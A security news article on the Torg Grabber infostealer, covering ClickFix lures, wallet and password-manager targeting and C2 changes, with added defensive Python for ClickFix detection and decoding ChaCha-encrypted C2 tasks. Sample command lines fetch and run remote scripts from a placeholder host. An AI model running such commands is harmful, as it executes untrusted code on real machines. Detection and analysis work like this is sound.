New Torg Grabber infostealer malware targets 728 crypto wallets
Security researchers have identified a new information-stealing malware, Torg Grabber, that targets 850 browser extensions, 728 of them cryptocurrency wallets.
For initial access the malware relies on the ClickFix technique: a lure page (typically a fake CAPTCHA or error prompt) silently copies a PowerShell command to the clipboard and instructs the visitor to paste and run it, so the victim launches the first stage by hand. Because a user, not a dropper, starts the interpreter, the technique sidesteps controls that key on downloaded executables, and it has proven effective at compromising targets.
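The ClickFix launch pattern described above leaves a characteristic trace in process-creation telemetry: an interpreter started by explorer.exe (the parent of anything typed into the Win+R Run dialog) with a pasted command line that hides its window, fetches something and executes it in memory, often with a trailing fake-CAPTCHA comment. The following triage logic is an added example, not code from Gen Digital's report or from the malware. The field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine); the indicator regexes, the explorer.exe heuristic and every sample command line are constructed for this example and are assumptions about how such lures typically land, not details taken from the article.

```python
import re

# Interpreters a ClickFix lure typically tells the victim to paste a command into.
# A paste into the Win+R Run dialog produces a process whose parent is explorer.exe.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line indicators (regex, label), matched case-insensitively. These are
# heuristics assumed for this example, not indicators published in the article.
INDICATORS = [
    (r"-(?:w|win|window|windowstyle)\s+h(?:idden)?\b", "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b", "remote fetch"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"\bmshta(?:\.exe)?\s+https?://", "mshta remote script"),
    (r"#.*(?:not a robot|human|verif)", "fake-CAPTCHA comment"),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix(event):
    """Classify one process-creation record (Sysmon Event ID 1 field names).

    Returns (alert, reasons). Alert when an interactive launch from explorer.exe
    carries at least one indicator, or when two or more indicators appear
    regardless of parent (script hosts and scheduled tasks also run such lures).
    """
    if _basename(event["Image"]) not in INTERPRETERS:
        return False, []
    hits = [label for pattern, label in INDICATORS
            if re.search(pattern, event["CommandLine"], re.IGNORECASE)]
    from_run_dialog = _basename(event["ParentImage"]) == "explorer.exe"
    alert = (from_run_dialog and len(hits) >= 1) or len(hits) >= 2
    if not alert:
        return False, []
    reasons = (["launched from explorer.exe (Run dialog)"] if from_run_dialog else []) + hits
    return True, reasons


def triage(events):
    """Indices of the events that should be raised as ClickFix candidates."""
    return [i for i, ev in enumerate(events) if is_clickfix(ev)[0]]


# Constructed sample events: none of these command lines come from real telemetry.
SAMPLE_EVENTS = [
    {   # 1. classic ClickFix paste: hidden window, fetch-and-iex, fake CAPTCHA comment
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/v | iex" '
                       "# I am not a robot - reCAPTCHA Verification ID: 8847",
    },
    {   # 2. benign admin use of the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users",
    },
    {   # 3. cmd.exe variant that hands off to mshta
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c mshta http://example.invalid/check.hta",
    },
    {   # 4. not an interpreter at all
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
    },
    {   # 5. hidden encoded launch from a script host (two indicators, no explorer parent)
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA",
    },
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i + 1, is_clickfix(SAMPLE_EVENTS[i])[1])
```

Events 1, 3 and 5 are raised; the plain administrative PowerShell launch in event 2 is not, because an explorer.exe parent alone is normal on a workstation. In production the same rule should be fed from Sysmon or Windows 4688 events with command-line auditing enabled, and the Run dialog's RunMRU registry key is a useful corroborating artifact in forensic follow-up.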
Cybersecurity company Gen Digital reports active, rapid development: between December 2025 and February 2026 its researchers identified 334 unique samples, and the operators register new command-and-control (C2) servers weekly.
Beyond the wallet extensions, the target list covers 103 password-manager and two-factor authentication extensions and 19 note-taking extensions, which together with the 728 wallets make up the 850 extensions in scope. A single infection can therefore hand an attacker both funds and the credentials and second factors that guard them.
Sophisticated evolution and technical capabilities
Gen Digital's technical analysis documents substantial changes to Torg Grabber's architecture and C2 communications. The earliest versions exfiltrated over Telegram, then moved to a custom encrypted TCP protocol.
On December 18, 2025, the developers dropped both in favour of HTTPS to C2 hosts fronted by Cloudflare. Fronting hides the origin server behind Cloudflare's address space and complicates IP-based blocking; the new channel also supports chunked uploads of large hauls and delivery of additional payloads.
The malware layers obfuscation, anti-analysis checks, direct syscalls and reflective loading. Direct syscalls bypass the user-mode API hooks that many EDR products rely on, and reflective loading maps later stages straight into memory rather than writing them to disk, so the stealer can operate entirely in memory and leaves far fewer artifacts for file-based detection.
On December 22, 2025, Torg Grabber gained an App-Bound Encryption (ABE) bypass. ABE, which Google added to Chrome in 2024, wraps the cookie-encryption key so that only the browser, via an elevated Windows service, can unwrap it; the bypass defeats that protection in Chrome, Brave, Edge, Vivaldi and Opera.
Researchers also found a companion tool, Underground, built for browser data extraction. It reflectively injects a DLL into the browser process and calls Chrome's COM elevation service from inside that process to have the master key decrypted. Running inside the browser matters because the elevation service only serves callers that appear to be the browser itself; the approach resembles one previously observed in VoidStealer.
Comprehensive data harvesting operations
Torg Grabber supports 25 Chromium-based browsers and 8 Firefox variants, systematically extracting saved credentials, cookies and autofill data from each.
The cryptocurrency wallet targeting is particularly comprehensive, with researchers noting that the 728 targeted wallets represent "essentially every crypto wallet ever conceived by human optimism." Major platforms including MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare are all within scope.
The malware's targeting extends beyond prominent platforms to include smaller projects with limited user bases, demonstrating the thoroughness of the threat actors' approach.
For password management and authentication, Torg Grabber targets 103 extensions, including industry leaders such as LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA.
Collection extends beyond the browser to communication platforms (Discord, Telegram), gaming services (Steam), VPN clients, FTP clients, email clients, desktop password managers and desktop cryptocurrency wallet applications.
Torg Grabber also profiles the host: hardware fingerprinting, a software inventory that specifically checks for 24 antivirus products, desktop screenshots, and theft of files from the Desktop and Documents folders.
A particularly concerning capability is remote shellcode execution. The implant receives payloads from the C2 server that are zlib-compressed and ChaCha-encrypted, decodes them and runs them in memory, which effectively turns the stealer into a loader: an infection need not end with credential theft.
Gen Digital stresses that development continues at pace, with new C2 domains registered weekly and a growing operator base. At the time of analysis researchers had catalogued 40 distinct operator tags, a sign of an expanding affiliate network rather than a single actor.
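The "ChaCha plus zlib" task format above is what an analyst has to reproduce to decode captured C2 payloads once the key and nonce are recovered from a sample. The following is an added example, not Gen Digital's code and not Torg Grabber's: it implements ChaCha20 as specified in RFC 8439 (20 rounds, 32-byte key, 32-bit block counter, 12-byte nonce) on top of the standard library, and pairs it with zlib on both the C2 side and the implant side. The article says only "ChaCha", so the exact variant (round count, nonce width, counter placement) and the compress-then-encrypt order are assumptions; the key, nonce and payload bytes are constructed for the demo, and a real decoder is adjusted to whatever the sample actually does.

```python
import struct
import zlib

MASK32 = 0xFFFFFFFF


def _rotl32(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK32


def quarter_round(a, b, c, d):
    """ChaCha quarter round (RFC 8439 section 2.1)."""
    a = (a + b) & MASK32; d = _rotl32(d ^ a, 16)
    c = (c + d) & MASK32; b = _rotl32(b ^ c, 12)
    a = (a + b) & MASK32; d = _rotl32(d ^ a, 8)
    c = (c + d) & MASK32; b = _rotl32(b ^ c, 7)
    return a, b, c, d


def self_check():
    """True if quarter_round reproduces the RFC 8439 section 2.1.1 test vector."""
    return quarter_round(0x11111111, 0x01020304, 0x9B8D6F43, 0x01234567) == \
        (0xEA2A92F4, 0xCB1CF8CE, 0x4581472E, 0x5881C4BB)


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block: 32-byte key, 32-bit block counter, 12-byte nonce."""
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]   # "expand 32-byte k"
    state += struct.unpack("<8I", key)
    state.append(counter & MASK32)
    state += struct.unpack("<3I", nonce)
    x = list(state)
    for _ in range(10):                                        # 10 double rounds = 20 rounds
        for a, b, c, d in ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15)):
            x[a], x[b], x[c], x[d] = quarter_round(x[a], x[b], x[c], x[d])   # columns
        for a, b, c, d in ((0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14)):
            x[a], x[b], x[c], x[d] = quarter_round(x[a], x[b], x[c], x[d])   # diagonals
    return struct.pack("<16I", *((x[i] + state[i]) & MASK32 for i in range(16)))


def chacha20_xor(key, nonce, data, counter=0):
    """Encrypt or decrypt (same operation) by XORing data with the keystream."""
    out = bytearray()
    for block_index, offset in enumerate(range(0, len(data), 64)):
        keystream = chacha20_block(key, counter + block_index, nonce)
        out += bytes(p ^ k for p, k in zip(data[offset:offset + 64], keystream))
    return bytes(out)


def pack_task(payload, key, nonce):
    """C2 side: compress, then encrypt. The compress-then-encrypt order is assumed."""
    return chacha20_xor(key, nonce, zlib.compress(payload))


def unpack_task(blob, key, nonce):
    """Implant or analyst side: decrypt, then inflate. None if the result is not a zlib stream."""
    try:
        return zlib.decompress(chacha20_xor(key, nonce, blob))
    except zlib.error:
        return None


# Constructed material for the demo: a fixed key and nonce (a real decoder uses values
# recovered from the sample) and a harmless placeholder in place of shellcode.
KEY = bytes(range(32))
NONCE = bytes(range(12))
PAYLOAD = b"\x90" * 200 + b"\xC3"      # NOP sled + RET stand-in, not a real payload

if __name__ == "__main__":
    blob = pack_task(PAYLOAD, KEY, NONCE)
    print("self-check:", self_check(), "wire bytes:", len(blob),
          "recovered:", unpack_task(blob, KEY, NONCE) == PAYLOAD)
```

Two points worth noticing when writing a real decoder. Plain ChaCha carries no authentication tag, so a wrong key or nonce is only detected indirectly, here by zlib rejecting the header, and a network observer sees nothing but a high-entropy blob; conversely, that means the format can be identified in traffic by entropy and by the absence of any recognisable framing rather than by content. And because zlib runs before encryption, payload size leaks through the ciphertext length, which is one of the few properties defenders can correlate across sessions.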